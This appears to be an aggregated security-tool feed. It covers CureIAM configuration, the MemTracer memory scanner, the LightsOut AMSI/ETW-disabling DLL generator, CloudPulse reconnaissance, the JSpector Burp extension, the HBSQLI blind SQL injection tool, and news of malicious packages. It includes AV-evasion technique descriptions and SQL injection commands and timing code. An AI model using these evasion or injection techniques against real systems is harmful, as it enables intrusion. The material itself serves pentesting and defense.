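    # Hedged sketch of a store plugin; the real EsStore lives in the CureIAM codebase.
    class EsStore:
        def __init__(self, scheme="http", host="localhost", port=9200,
                     index="cureiam-stg", username=None, password=None):
            # Each keyword argument corresponds one-to-one with a key under `params:`.
            self.scheme, self.host, self.port = scheme, host, port
            self.index, self.username, self.password = index, username, password

        def write(self, records):
            # A real store plugin would push `records` to Elasticsearch here.
            raise NotImplementedError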

    3. Once the plugins are defined, the next step is to define the pipeline for auditing. It goes like this:
      audits:
        IAMAudit:
          clouds:
            - gcpCloud
          processors:
            - gcpIamProcessor
          stores:
            - filestore
            - esstore

    Multiple audits can be created out of this. The one created here is named IAMAudit, with four plugins in use: gcpCloud, gcpIamProcessor, filestore and esstore. Note that these are the same plugin names defined in step 2. Again, this only defines the pipeline; it does not run it. It will be considered for running by the definition in the next step.

    4. Tell CureIAM to run the audits defined in the previous step.
      run:
        - IAMAudits

    This completes the configuration for CureIAM. You can find the full sample here. This config-driven pipeline concept is inherited from the Cloudmarker framework.

    Dashboard

    The JSON which is indexed in Elasticsearch using the Elasticsearch store plugin can be used to generate a dashboard in Kibana.

    Contribute

    [Please do!] We are looking for any kind of contribution to improve CureIAM's core functionality and documentation. When in doubt, make a PR!

    Credits

    Gojek Product Security Team

    Demo


    =============

    NEW UPDATES May 2023 0.2.0

    Refactoring

    • Breaking down the large code into multiple small functions
    • Moving all plugins into the plugins folder: Esstore, files, Cloud and GCP.
    • Fixing zero-division issues
    • Migrating to the new major version of Elastic
    • Changing the configuration in the CureIAM.yaml file
    • Tested with Python 3.9.x

    Library Updates

    Library versions are now pinned to avoid any backward-compatibility issues.

    • Elastic==8.7.0 # previously 7.17.9
    • elasticsearch==8.7.0
    • google-api-python-client==2.86.0
    • PyYAML==6.0
    • schedule==1.2.0
    • rich==13.3.5

    Docker Files

    • Added Docker Compose for local Elastic and Kibana in elastic
    • Added .env-ex; rename .env-ex to .env before running Docker
      Running docker compose: docker-compose -f docker_compose_es.yaml up

    Features

    • Added the capability to run a scan without applying the recommendations. By default, if mode_scan is false, mode_enforce won't run.
          mode_scan: true
          mode_enforce: false
    • Temporarily turned off the email function.


    MemTracer - Memory Scanner

    By: Zion3R


    MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. MemTracer is implemented in Python and aims to detect reflectively loaded native .NET framework Dynamic-Link Libraries (DLLs). This is achieved by looking for the following abnormal memory region characteristics (a minimal detection sketch follows the list below):

    • The state of the memory pages in each memory region: specifically, the MEM_COMMIT flag, which indicates that the pages have been committed for use.
    • The type of pages in the region: the MEM_MAPPED page type indicates that the memory pages within the region are mapped into the view of a section.
    • The memory protection for the region: PAGE_READWRITE indicates that the memory region is readable and writable, which happens if the Assembly.Load(byte[]) method is used to load a module into memory.
    • The memory region contains a PE header.
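
    A minimal sketch of how these characteristics can be checked with the Win32 API via ctypes (an illustration under assumptions, not MemTracer's actual implementation; requires Windows and sufficient privileges):

    import ctypes
    import ctypes.wintypes as wt

    MEM_COMMIT = 0x1000
    MEM_MAPPED = 0x40000
    PAGE_READWRITE = 0x04
    PROCESS_QUERY_INFORMATION = 0x0400
    PROCESS_VM_READ = 0x0010

    class MEMORY_BASIC_INFORMATION(ctypes.Structure):
        _fields_ = [("BaseAddress", ctypes.c_void_p),
                    ("AllocationBase", ctypes.c_void_p),
                    ("AllocationProtect", wt.DWORD),
                    ("RegionSize", ctypes.c_size_t),
                    ("State", wt.DWORD),
                    ("Protect", wt.DWORD),
                    ("Type", wt.DWORD)]

    def suspicious_regions(pid):
        """Yield (base_address, size) of committed, mapped, RW regions that start with 'MZ'."""
        k32 = ctypes.windll.kernel32
        k32.OpenProcess.restype = wt.HANDLE
        k32.VirtualQueryEx.restype = ctypes.c_size_t
        handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
        mbi = MEMORY_BASIC_INFORMATION()
        address = 0
        while k32.VirtualQueryEx(handle, ctypes.c_void_p(address),
                                 ctypes.byref(mbi), ctypes.sizeof(mbi)):
            if (mbi.State == MEM_COMMIT and mbi.Type == MEM_MAPPED
                    and mbi.Protect == PAGE_READWRITE):
                buf = ctypes.create_string_buffer(2)
                read = ctypes.c_size_t(0)
                # A region whose first bytes are "MZ" likely contains a PE header.
                if k32.ReadProcessMemory(handle, ctypes.c_void_p(mbi.BaseAddress),
                                         buf, 2, ctypes.byref(read)) and buf.raw == b"MZ":
                    yield mbi.BaseAddress, mbi.RegionSize
            address += mbi.RegionSize
        k32.CloseHandle(handle)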

    The tool starts by scanning the running processes and analyzing the characteristics of their allocated memory regions to detect symptoms of reflective DLL loading. Suspicious memory regions that are identified as DLL modules are dumped for further analysis and investigation.
    Furthermore, the tool features the following options:

    • Dump the compromised process.
    • Export a JSON file that provides information about the compromised process, such as the process name, ID, path, size, and base address.
    • Search for specific loaded module by name.

    Example

    python.exe memScanner.py [-h] [-r] [-m MODULE]
    -h, --help show this help message and exit
    -r, --reflectiveScan Looking for reflective DLL loading
    -m MODULE, --module MODULE Looking for a specific loaded DLL

    The script needs administrator privileges in order to inspect all processes.



    LightsOut - Generate An Obfuscated DLL That Will Disable AMSI And ETW

    By: Zion3R


    LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, XOR-encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).
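
    As a rough illustration of the string-encoding idea (a hedged sketch, not LightsOut's actual generator, which emits obfuscated C), XOR-encoding a string with a single-byte key could look like this:

    import random

    def xor_encode(plaintext: str, key=None):
        # Pick a random single-byte key unless one is supplied.
        key = key if key is not None else random.randint(1, 255)
        encoded = bytes(b ^ key for b in plaintext.encode())
        c_array = ", ".join(f"0x{b:02x}" for b in encoded)
        # Emit a C declaration that a generated DLL could decode at runtime.
        return key, f"unsigned char enc[] = {{ {c_array} }}; /* XOR key: 0x{key:02x} */"

    key, c_decl = xor_encode("AmsiScanBuffer")
    print(c_decl)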

    LightsOut is designed to work on Linux systems with python3 and mingw-w64 installed. No other dependencies are required.


    Features currently include:

    • XOR encoding for strings
    • WinAPI function name randomization
    • Multiple sandbox check options
    • Hardware breakpoint bypass option
     _______________________
    | |
    | AMSI + ETW |
    | |
    | LIGHTS OUT |
    | _______ |
    | || || |
    | ||_____|| |
    | |/ /|| |
    | / / || |
    | /____/ /-' |
    | |____|/ |
    | |
    | @icyguider |
    | |
    | RG|
    `-----------------------'
    usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]

    Generate an obfuscated DLL that will disable AMSI & ETW

    options:
    -h, --help show this help message and exit
    -m <method>, --method <method>
    Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
    -s <option>, --sandbox <option>
    Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
    -sa <value>, --sandbox-arg <value>
    Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
    -k <key>, --key <key>
    Key to encode strings with (randomly generated by default)
    -o <outfile>, --outfile <outfile>
    File to save DLL to

    Remote options:
    -p <pid>, --pid <pid>
    PID of remote process to patch

    Intended Use/Opsec Considerations

    This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.

    Usage Examples

    You can transfer the output DLL to your target system and load it into PowerShell in various ways. For example, it can be done via P/Invoke with LoadLibrary:

    Or even easier, copy powershell to an arbitrary location and side load the DLL!

    Greetz/Credit/Further Reference:



    27 Malicious PyPI Packages with Thousands of Downloads Found Targeting IT Experts

    An unknown threat actor has been observed publishing typosquat packages to the Python Package Index (PyPI) repository for nearly six months with an aim to deliver malware capable of gaining persistence, stealing sensitive data, and accessing cryptocurrency wallets for financial gain. The 27 packages, which masqueraded as popular legitimate Python libraries, attracted thousands of downloads,

    Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI

    A new set of malicious Python packages has slithered its way to the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems. The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware called BlazeStealer, Checkmarx said in a report shared with The Hacker News. "[BlazeStealer]

    Trojanized PyCharm Software Version Delivered via Google Search Ads

    A new malvertising campaign has been observed capitalizing on a compromised website to promote spurious versions of PyCharm on Google search results by leveraging Dynamic Search Ads. "Unbeknownst to the site owner, one of their ads was automatically created to promote a popular program for Python developers, and visible to people doing a Google search for it," Jérôme Segura, director of threat

    CloudPulse - AWS Cloud Landscape Search Engine

    By: Zion3R


    During the reconnaissance phase, an attacker searches for any information about their target to create a profile that will later help them identify possible ways to get into an organization.
    CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse, security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


    CloudPulse simplifies security assessments with a user-friendly interface. It allows you to effortlessly find a company's assets on AWS cloud:

    • IPs
    • subdomains
    • domains associated with a target
    • organization name
    • origin IPs

    1- Download CloudPulse:

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Run docker compose:

    docker-compose up -d

    3- Run the script.py script:

    docker-compose exec web python script.py

    4- Now go to http://:8000/search and enjoy the search engine

    1- Download CloudPulse:

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Set up a virtual environment:

    python3 -m venv myenv
    source myenv/bin/activate

    3- Install the requirements.txt file:

    pip install -r requirements.txt

    4- Run an instance of Elasticsearch using Docker:

    docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

    5- Update script.py and the settings file to use the host 'localhost':

    # script.py
    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])

    # se/settings.py
    ELASTICSEARCH_DSL = {
        'default': {
            'hosts': 'localhost:9200'
        },
    }

    6- Run script.py to index the data in Elasticsearch:

    python script.py
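
    For context, the indexing step could conceptually look like the following hedged sketch (the index name and the use of csv.DictReader are assumptions, and the client call style assumes an elasticsearch-py version compatible with the ES 6.x instance above; the real script.py may differ):

    import csv
    from elasticsearch import Elasticsearch

    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])

    with open("data.csv", newline="", encoding="utf-8") as fh:
        for i, row in enumerate(csv.DictReader(fh)):
            # Index each CSV row as a document so the search engine can query it.
            es.index(index="cloudpulse", doc_type="_doc", id=i, body=row)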

    7- Run the app:

    python manage.py runserver 0:8000

    Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository, clone the data, and update the data.csv file (the full dataset contains close to 9 million records).

    As an example, searching for .mil data gives:

    Searching for tesla as an example gives:

    CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
    Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



    JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

    By: Zion3R


    JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.
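
    To illustrate the kind of passive extraction JSpector performs, here is a hedged Python sketch (JSpector itself is a Jython Burp extension; the regexes and the list of dangerous methods below are assumptions, not its actual rules):

    import re

    URL_RE = re.compile(r"https?://[^\s'\"<>]+")
    ENDPOINT_RE = re.compile(r"['\"](/[A-Za-z0-9_\-./]+)['\"]")
    DANGEROUS = ("eval(", "innerHTML", "document.write(", "setTimeout(", "Function(")

    def analyze_js(body: str) -> dict:
        # Collect absolute URLs, relative endpoints, and dangerous sinks found in a JS body.
        return {
            "urls": sorted(set(URL_RE.findall(body))),
            "endpoints": sorted(set(ENDPOINT_RE.findall(body))),
            "dangerous": sorted(m for m in DANGEROUS if m in body),
        }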


    Prerequisites

    Before installing JSpector, you need to have Jython installed on Burp Suite.

    Installation

    1. Download the latest version of JSpector
    2. Open Burp Suite and navigate to the Extensions tab.
    3. Click the Add button in the Installed tab.
    4. In the Extension Details dialog box, select Python as the Extension Type.
    5. Click the Select file button and navigate to the JSpector.py.
    6. Click the Next button.
    7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

    Usage

    • Just navigate through your targets and JSpector will start passively crawling JS files in the background and automatically return the results on the Dashboard tab.
    • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



    HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

    By: Zion3R


    HBSQLI is an automated command-line tool for performing header-based blind SQL injection attacks on web applications. It automates the process of detecting header-based blind SQL injection vulnerabilities, making it easier for security researchers, penetration testers and bug bounty hunters to test the security of web applications.


    Disclaimer:

    This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

    The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

    Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

    By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

    Installation

    Install HBSQLI with following steps:

    $ git clone https://github.com/SAPT01/HBSQLI.git
    $ cd HBSQLI
    $ pip3 install -r requirements.txt

    Usage/Examples

    usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

    options:
    -h, --help show this help message and exit
    -l LIST, --list LIST To provide list of urls as an input
    -u URL, --url URL To provide single url as an input
    -p PAYLOADS, --payloads PAYLOADS
    To provide payload file having Blind SQL Payloads with delay of 30 sec
    -H HEADERS, --headers HEADERS
    To provide header file having HTTP Headers which are to be injected
    -v, --verbose Run on verbose mode

    For Single URL:

    $ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

    For List of URLs:

    $ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

    Modes

    There are basically two modes: verbose, which shows the whole process and the status of each test performed, and non-verbose, which just prints the vulnerable ones on the screen. To initiate verbose mode, just add -v to your command.

    Notes

    • You can use the provided payload file or a custom payload file; just remember that the delay in each payload in the payload file should be set to 30 seconds (see the sketch after these notes).

    • You can use the provided headers file or add more custom headers to that file according to your needs.
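
    As referenced in the notes above, the core of a header-based, time-blind check can be sketched as follows (a hedged illustration, not hbsqli.py itself; the 25-second threshold is an assumed heuristic derived from the 30-second payload delay):

    import time
    import requests

    DELAY = 30          # seconds of sleep encoded in each payload
    THRESHOLD = 25      # a response slower than this suggests the payload executed

    def test_header(url: str, header: str, payload: str) -> bool:
        # Inject the payload into a single header and time the response.
        start = time.time()
        try:
            requests.get(url, headers={header: payload}, timeout=DELAY + 15)
        except requests.exceptions.Timeout:
            return True
        return (time.time() - start) >= THRESHOLD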

    Demo



    Malicious NuGet Package Targeting .NET Developers with SeroXen RAT

    A malicious package hosted on the NuGet package manager for the .NET Framework has been found to deliver a remote access trojan called SeroXen RAT. The package, named Pathoschild.Stardew.Mod.Build.Config and published by a user named Disti, is a typosquat of a legitimate package called Pathoschild.Stardew.ModBuildConfig, software supply chain security firm Phylum said in a report today. While